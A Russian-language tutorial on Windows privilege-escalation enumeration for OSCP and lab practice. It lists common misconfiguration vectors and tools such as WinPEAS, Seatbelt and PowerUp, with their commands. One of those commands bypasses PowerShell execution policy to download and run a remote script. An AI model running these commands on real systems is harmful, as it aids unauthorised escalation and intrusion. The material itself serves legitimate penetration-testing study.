После первоначального доступа к Windows‑хосту (обычно это базовая shell/метерпитетер) злоумышленник или тестировщик (аха, то есть мы) часто ограничен правами. Чтобы повысить привилегии, требуется быстро перечислить файлы, директории, права, журналы и хранилища (SAM и др.). Объём артефактов в Windows огромен, и ручная проверка даже при хорошем опыте занимает много времени. Логичный путь — автоматизировать перечисление с помощью скриптов и чекеров. Тема незаменима на экзамене OSCP и при прохождении тачек на HTB.
«Эскалация привилегий» — стадия после компрометации, в рамках которой собирается критичная для системы информация: скрытые пароли, слабоконфигурированные службы/приложения, уязвимые политики, кривой доступ, лишние сервисы в RAM и т.д. Именно эти сведения позволяют выполнить пост‑эксплуатацию и получить более высокий уровень прав.
Критичные векторы повышения привилегий в Windows
Версия ОС и билд.
Уязвимые/устаревшие пакеты и компоненты.
Каталоги и файлы с правами Modify/Full Control у обычных пользователей.
Сопоставленные сетевые диски, шары DFS.
Потенциально интересные файлы (ключи, конфиги, бэкапы).
Нековыченные пути служб (Unquoted Service Paths).
Сетевые сведения: интерфейсы/ARP/
netstat.Состояние и правила брандмауэра.
Запущенные в RAM процессы.
Проверка реестра AlwaysInstallElevated (HKLM/HKCU).
Сохранённые учётные данные/креды.
DLL‑Hijacking и порядок поиска библиотек.
Планировщик заданий (Scheduled Tasks).
Ниже — набор скриптов, которыми удобно быстро находить такие векторы.
Инструменты перечисления (тестировано на Windows 10/11)
SharpUp
.NET‑утилита для поиска слабых служб, прав на каталоги/бинарники, некорректных путей и опасных политик. Работает не оч быстро, но всегда в арсенале
SharpUp.exe auditWinPEAS
Классический чекер PE‑векторов: службы, каталоги PATH, AlwaysInstallElevated, токены и др. Простенько, но со вкусом!
winPEASx64.exe quietSeatbelt
Сбор артефактов конфигурации (группами), включая привилегии, установленный софт, службы и многое другое. Удобно и быстро!
Seatbelt.exe -group=systemJAWS (Just Another Windows Enum Script)
PowerShell‑скрипт общего перечисления: пользователи/группы, службы с небезопасными правами, задания и пр. Шустрый скрипт!
powershell -ep bypass -c "IEX (Get-Content .\jaws.ps1 -Raw); Invoke-Jaws"PowerShell Empire — PowerUp
Модуль PowerUp проверяет и демонстрирует эксплуатацию типичных мисконфигов (службы, реестр, кавычки, ACL).
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://intranet/PowerUp.ps1'); Invoke-AllChecks"PowerShell Empire — Sherlock
Исторический модуль для поиска известных локальных уязвимостей (MS16‑032 и др.); полезен в лабораториях. Шерлок оправдывает свое название :)
Import-Module .\Sherlock.ps1; Find-AllVulnsПрактические техники (короткий обзор)
Слабые службы и некавыченные пути
sc qc "Vuln Service"
icacls "C:\Program Files\Vuln Service"Планировщик заданий
schtasks /query /fo LIST /vСмотрим AlwaysInstallElevated
reg query HKCU\...\Installer /v AlwaysInstallElevated
reg query HKLM\...\Installer /v AlwaysInstallElevatedПривилегии токена
whoami /privПрава на каталоги
icacls "C:\ProgramData\Apps\TestApp"Ну, вот в принципе и все! Самые известные (мне) и ходовые тулзы. Ни разу не подвели на CTF и помогут на OSCP.
! Официальная документация !
Microsoft Docs — AlwaysInstallElevated policy
Microsoft Docs — Service security & access rights, SCM API
Microsoft Docs — Privilege use auditing, Credentials protection
Ссылки: утилиты и скрипты
Заключение
Повышение привилегий в Windows чаще всего упирается в конфигурационные огрехи: права на каталоги, службы, планировщик, MSI‑политики и привилегии токена. Автоматизированные чекеры ускоряют первичное перечисление, но итог всегда должен быть подтверждён вручную и оформлен в отчёте с рекомендациями по исправлению. Ну, что сохраняй в закладки!